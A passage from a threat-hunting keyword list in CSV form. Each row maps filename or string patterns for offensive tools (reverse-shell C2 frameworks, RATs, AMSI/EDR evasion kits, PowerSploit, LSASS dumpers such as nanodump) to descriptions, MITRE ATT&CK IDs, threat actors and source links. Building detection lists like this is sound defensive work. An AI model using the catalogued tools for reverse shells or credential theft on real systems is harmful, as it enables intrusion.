security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*powershell_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*powershell_reverse_tcp_v2.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*powershell-admin-download-execute.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*PowershellAgentGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowershellAmsiGenerator*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowerShellArsenal*,offensive_tool_keyword,PowerShellArsenal,PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. 
etc.,T1057 - T1053 - T1050 - T1564 - T1083 - T1003,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/mattifestation/PowerShellArsenal,1,1,N/A,N/A,9,827,224,2021-08-20T08:41:50Z,2014-11-16T15:20:17Z -*PowerShellArtifactGenerator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*PowershellCradleGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowerShellEmpire*,offensive_tool_keyword,empire,PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. 
many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://www.powershellempire.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowerShellExecuter.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*powershell-import *.ps1*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*powershell-import*Invoke-Kerberoast.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell-import*ShareFinder.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowershellKerberos-main*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,1,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*PowerShellMafia*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowerShellMafia/PowerSCCM*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - 
TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerShellMafia/PowerSploit*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerShellObfuscator.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PowershellRunner.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*PowerShellStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*PowerShell-Suite*,offensive_tool_keyword,PowerShell-Suite,There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.,T1059 - T1086 - T1140 - T1145 - T1216,TA0002 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/PowerShell-Suite,1,1,N/A,N/A,10,2510,794,2021-11-19T12:18:24Z,2015-12-11T13:14:41Z -*PowerShx.dll*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx.exe*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx.sln*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShxDll.csproj*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - 
TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx-master*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerSploit*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit-*.zip*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit.*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit/releases*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*powerstager*,offensive_tool_keyword,PowerStager,PowerStager: This script creates an executable stager that downloads a selected powershell payload.,T1105 - T1059.001 - T1204,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/z0noxz/powerstager,1,1,N/A,N/A,2,181,59,2019-12-15T09:30:05Z,2017-04-17T12:13:31Z -*PowerUp.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerUp.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerUpSQL*,offensive_tool_keyword,PowerUpSQL,PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. 
It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.,T1087 - T1059 - T1003 - T1078 - T1053 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/NetSPI/PowerUpSQL,1,1,N/A,N/A,10,2182,456,2023-06-27T02:42:35Z,2016-06-22T01:22:39Z -*PowerView.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*PowerView.ps1*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powerview.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerView.ps1*,offensive_tool_keyword,powerview,PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. 
It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist,T1087 - T1069 - T1064 - T1002 - T1552,TA0002 - TA0003 - TA0008,N/A,N/A,Information Gathering,https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon,1,0,N/A,N/A,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerView_dev.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*PowerView3-Aggressor*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*ppajinakbfocjfnijggfndbdmjggcmde*,greyware_tool_keyword,My Browser Vpn,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ppenum.c*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.exe*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.x64.*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.x86.*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppl* --elevate-handle *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*ppl_dump.x64*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ppl_medic_dll.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
